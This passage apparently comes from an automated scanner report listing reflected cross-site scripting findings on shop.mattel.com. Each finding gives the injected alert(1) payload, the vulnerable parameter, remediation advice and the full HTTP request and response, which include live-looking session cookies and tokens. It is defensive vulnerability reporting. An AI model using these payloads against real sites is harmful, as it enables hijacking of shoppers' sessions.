Date: Thu, 23 Dec 2010 00:14:53 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45700


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&locale=es_US8d597--><script>alert(1)</script>d903fe711aa -->
...[SNIP]...

1.36. http://shop.mattel.com/home/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24863"-alert(1)-"78eaf9b6a31 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US24863"-alert(1)-"78eaf9b6a31 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:52 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45652


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
= {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&locale=es_US24863"-alert(1)-"78eaf9b6a31";
   </script>
...[SNIP]...

1.37. http://shop.mattel.com/home/index.jsp [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the locale request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b57"-alert(1)-"f7a8c4aca52 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/index.jsp?locale=es_USa4b57"-alert(1)-"f7a8c4aca52 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45424


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="locale=es_USa4b57"-alert(1)-"f7a8c4aca52";
   </script>
...[SNIP]...

1.38. http://shop.mattel.com/home/index.jsp [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The value of the locale request parameter is copied into an HTML comment. The payload 2478f--><script>alert(1)</script>76d14968a7c was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?locale=es_US2478f--><script>alert(1)</script>76d14968a7c HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:59 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45472


                                                                                                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<!-- === Request Query String: locale=es_US2478f--><script>alert(1)</script>76d14968a7c -->
...[SNIP]...

1.39. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cd009--><script>alert(1)</script>6d63d6430fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?cd009--><script>alert(1)</script>6d63d6430fa=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:51 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45420


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<!-- === Request Query String: cd009--><script>alert(1)</script>6d63d6430fa=1 -->
...[SNIP]...

1.40. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5513"-alert(1)-"f377ef9f75a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home/index.jsp?a5513"-alert(1)-"f377ef9f75a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45089


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="a5513"-alert(1)-"f377ef9f75a=1";
   </script>
...[SNIP]...

1.41. http://shop.mattel.com/product/index.jsp [cp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53258"-alert(1)-"114d4ef9b54 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/index.jsp?productId=4199678&cp=3719987.3741284.374127853258"-alert(1)-"114d4ef9b54 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:45 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:52 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36580


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


               
...[SNIP]...
text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="productId=4199678&cp=3719987.3741284.374127853258"-alert(1)-"114d4ef9b54";
   </script>
...[SNIP]...

1.42. http://shop.mattel.com/product/index.jsp [cp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The value of the cp request parameter is copied into an HTML comment. The payload d67b6--><script>alert(1)</script>c8c1a5320e3 was submitted in the cp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /product/index.jsp?productId=4199678&cp=3719987.3741284.3741278d67b6--><script>alert(1)</script>c8c1a5320e3 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36612


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


               
...[SNIP]...
<!-- === Request Query String: productId=4199678&cp=3719987.3741284.3741278d67b6--><script>alert(1)</script>c8c1a5320e3 -->
...[SNIP]...

1.43. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload babdb--><script>alert(1)</script>332e4ffe94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /product/index.jsp?productId=4199678&babdb--><script>alert(1)</script>332e4ffe94=1 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=jsx3NSTW0ThmFQdF2nz80hkG10LQN52LGC89LfycTTn9WzHlzvxm!-1434729825; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:45 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54410


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<!-- === Request Query String: productId=4199678&babdb--><script>alert(1)</script>332e4ffe94=1 -->
...[SNIP]...

1.44. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cc08"-alert(1)-"8a2c85cf2ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product/index.jsp?productId=4199678&1cc08"-alert(1)-"8a2c85cf2ad=1 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:34 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=CyQ2NSTSyvhGDxW9mLkXPrJrLljhvJTfK4WtPV9v1cD6VrL85yf1!755340761; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:41 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54343


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="productId=4199678&1cc08"-alert(1)-"8a2c85cf2ad=1";
   </script>
...[SNIP]...

1.45. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /productAlerts/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 71d78--><script>alert(1)</script>e4fc885191d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /productAlerts/index.jsp?71d78--><script>alert(1)</script>e4fc885191d=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:29 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36572


